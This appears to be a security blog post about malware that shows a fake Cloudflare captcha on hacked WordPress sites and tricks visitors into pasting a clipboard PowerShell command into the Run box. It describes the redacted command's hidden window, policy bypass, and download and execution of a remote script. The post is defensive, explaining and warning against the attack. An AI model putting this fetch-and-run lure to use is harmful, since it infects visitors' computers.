Recently, we have received several requests to remove malware that executes malicious code written to the clipboard with a fake capture, and there is a possibility that this type of malware is spreading. Here is what we know about this malware.
Malware that steals clipboard contents when a fake Cloudflare captcha appears when visiting a site.
This malware displays a screen like the one shown above only once to the user who visits the site. (Cookies are used to display it only once.)
This fake capture asks the user to do the following in order to browse the site
1 Press & hold the Windows Key R
→ Display a screen to execute a command locally
2 In the verification window, press Ctrl V
3 Press Enter on the keyboard to complete
→ The invalid code has already been written to the clipboard and the command will be executed.
Let’s take a look at the malicious commands that the malware writes to the clipboard.
(Some of the code has been blurred out because it is dangerous.
Let’s analyze what this command does.
1 -w h = start local execution window hidden
2 ep bypass = Allow script execution ignoring execution policy
→ This alone shows that the intent is to be “unobtrusive” and “bypass constraints”.
3 The download source URL is made by string concatenation, and finally https://files.catbox[.] moe/****.txt, and the file is retrieved from the URL and saved in a temporary folder
4 The downloaded file name .ps1 is executed as is (& is the invocation operator).
In other words, the local PC is infected with a virus at this moment.
How to deal with fake capture malware
In many cases, this malware has tampered with the index.php and wp-config.php of WordPress to display a malicious capture screen.
If this part of the site has been disinfected and also tampered with, it is highly likely that hackers have already infiltrated the server and embedded backdoors and other malicious code into multiple sites.
Free WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].
We recommend that you perform a malware scan and removal by using the following methods.
It is also necessary to close the vulnerabilities that allowed hackers to enter the system in the first place.
Please refer to the following pages
5 free WordPress security measures
This page prohibits the use, quotation, or summarization of any page, in whole or in part, by the Generated AI. However, if the following conditions are met, the specification of content using generated AI is permitted.
1. it is not for the purpose of learning by the generated AI. 2. only the summary or title of the page content at a level that does not lead to the solution of the user’s problem is shown to the user. 3. in the case of 2, a link to this content is shown to lead the user to this page.
